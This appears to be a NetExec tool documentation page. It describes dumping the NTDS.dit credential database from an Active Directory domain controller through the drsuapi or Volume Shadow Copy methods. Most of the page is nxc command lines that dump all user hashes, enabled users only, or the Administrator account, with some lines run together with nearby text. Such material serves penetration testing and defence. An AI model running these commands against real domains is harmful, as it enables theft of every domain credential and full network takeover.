Dump NTDS.dit
Dump the NTDS.dit from target DC using methods from secretsdump.py
2 methods are available:
(default) drsuapi - Uses drsuapi RPC interface create a handle, trigger replication, and combined with
additional drsuapi calls to convert the resultant linked-lists into readable format
vss - Uses the Volume Shadow copy Service Dump all users from the NTDS.dit
nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds
nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds --enabled
nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds vssDump a specific user only
nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds --user Administratornxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' -M ntdsutilLast updated
Was this helpful?

